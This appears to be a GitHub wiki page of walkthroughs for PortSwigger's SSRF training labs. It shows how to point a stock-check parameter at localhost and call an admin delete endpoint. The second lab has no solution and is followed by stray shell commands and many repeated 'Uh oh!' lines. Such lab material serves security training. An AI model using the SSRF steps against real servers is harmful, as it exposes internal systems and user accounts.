Server side request forgery (SSRF)

Apprentice lab: Basic SSRF against the local server

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

Solution
1. Browse the site, and look for the Check stock functionality on a product.
2. Intercept Check stock
3. In the Request make the stockApi equal to http://localhost (URL encode it ⌘ U) and foward.
4. Notice we get an Admin panel in the Response. /admin endpoint has been accesed.
5. Attempting to delete carlos reveals /admin/delete?username=carlos
6. Intercept Check stoke and make stockApi equal to http://localhost/admin/delete?username=carlos delivering a SSRF attack.

Apprentice lab: Basic SSRF against another back-end system

https://chatgpt.com/share/f11e5ffc-be5b-4717-8dbf-2a9abfb807d3
`python3 -m venv .`
`source bin/activate`
`deactivate`

This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

Solution

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

Home

Server-side topics:

Client-side topics:

Advanced topics:

Server side request forgery (SSRF)

Apprentice lab: Basic SSRF against the local server

Apprentice lab: Basic SSRF against another back-end system

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Home

Clone this wiki locally